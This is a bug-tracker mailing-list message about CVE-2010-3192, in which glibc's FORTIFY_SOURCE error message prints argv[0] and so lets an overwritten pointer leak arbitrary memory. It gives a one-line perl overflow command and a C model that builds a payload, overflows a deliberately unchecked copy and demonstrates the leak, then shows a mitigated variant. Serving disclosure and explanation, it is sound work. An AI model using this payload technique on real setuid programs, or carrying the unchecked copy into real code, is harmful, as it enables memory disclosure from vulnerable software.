[Bug 562614] Re: Potential information disclosure vulnerability in FORTIFY_SOURCE
Jack Ren
562614 at bugs.launchpad.net
Tue Sep 7 12:20:19 UTC 2021
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3192
https://bugs.launchpad.net/bugs/562614
Title:
Potential information disclosure vulnerability in FORTIFY_SOURCE
Status in glibc package in Ubuntu:
Confirmed
Bug description:
The error message generated when stack smashing is detected in a
program compiled with -D FORTIFY_SOURCE includes a reference to argv[0].
Since argv[0] resides further up the stack from an overflowed buffer,
if an application is vulnerable to a stack-based buffer overflow that
allows the attacker to overwrite this pointer, the error message will
print out arbitrary memory.
While this behavior requires the pre-existence of another
vulnerability to be considered a security issue, it doesn't seem like
a good idea to allow an attacker to read arbitrary memory of setuid
binaries (for example) in the event of a mitigated stack overflow.
I've attached a contrived example to reproduce the issue. It's a
classic strcpy() buffer overflow. An unused string is in the .data
section as a target to read. By executing:
./strcpy `perl -e 'print "\xa0\x85\x04\x08"x80'`
the string will be printed out in the FORTIFY_SOURCE error message.
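The mechanism the report describes, as an added example (it is neither the reporter's attachment, which is not on this page, nor glibc's code): a C model of the disclosure. The overflowed buffer and the saved argv[0] pointer are placed in one struct so their adjacency is deterministic rather than compiler-dependent; memcpy with an attacker-chosen length stands in for strcpy so that a full 64-bit pointer, NUL bytes included, can be overwritten; and the fortify failure path is modelled as a function that formats the process name straight from that pointer. leak_target, struct frame, fortify_style_report, vulnerable_copy, build_payload, disclosed_name and safe_report are names of this example only, and the "supersecret" string is constructed sample data.

```c
/* Model of the argv[0] disclosure in a fortify-style error message.
 * Example code, not glibc's implementation. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Constructed stand-in for the report's "unused string in .data". */
char leak_target[] = "supersecret: contents an attacker should not see";

/* Model of the vulnerable frame: the buffer sits directly below the saved
 * argv[0] pointer that the error path later dereferences. The struct fixes
 * the layout; on a real stack the distance is up to the compiler. */
struct frame {
    char buf[16];
    const char *argv0;
};

/* Model of the failure path the report complains about: the process name is
 * taken from the (possibly attacker-controlled) argv0 pointer. */
int fortify_style_report(const struct frame *f, char *out, size_t outlen)
{
    return snprintf(out, outlen,
                    "*** buffer overflow detected ***: %s terminated",
                    f->argv0 ? f->argv0 : "<unknown>");
}

/* Mitigated variant: the message never dereferences anything that lives in
 * the corrupted frame. */
int safe_report(char *out, size_t outlen)
{
    return snprintf(out, outlen, "*** buffer overflow detected ***: terminated");
}

/* Unchecked copy, standing in for the report's strcpy(). A length-driven
 * memcpy is used so the whole pointer, NUL bytes included, can be
 * overwritten on 64-bit targets. */
void vulnerable_copy(struct frame *f, const unsigned char *in, size_t len)
{
    f->argv0 = "./strcpy";     /* the real argv[0], set before the overflow */
    memcpy(f->buf, in, len);   /* no bounds check: spills into argv0 */
}

/* Constructed attacker input: filler up to the pointer, then the address of
 * leak_target in native byte order (the report's "\xa0\x85\x04\x08" x 80).
 * Returns the payload length, or 0 if out is too small. */
size_t build_payload(unsigned char *out, size_t outlen)
{
    size_t off = offsetof(struct frame, argv0);
    const char *target = leak_target;
    if (outlen < off + sizeof target)
        return 0;
    memset(out, 'A', off);
    memcpy(out + off, &target, sizeof target);
    return off + sizeof target;
}

/* Runs the overflow, formats the error message into msg, and returns the
 * pointer the message was built from. */
const char *disclosed_name(char *msg, size_t msglen)
{
    struct frame f;
    unsigned char payload[64];
    size_t n = build_payload(payload, sizeof payload);
    vulnerable_copy(&f, payload, n);
    fortify_style_report(&f, msg, msglen);
    return f.argv0;
}

int main(void)
{
    char msg[128];
    disclosed_name(msg, sizeof msg);
    puts(msg);                 /* the .data string appears in place of argv[0] */
    safe_report(msg, sizeof msg);
    puts(msg);
    return 0;
}
```

The point the model makes is the one in the report: once the frame is corrupted, any pointer the error path reads from it is attacker data, so the mitigation on the reporting side is to print nothing fetched through such a pointer.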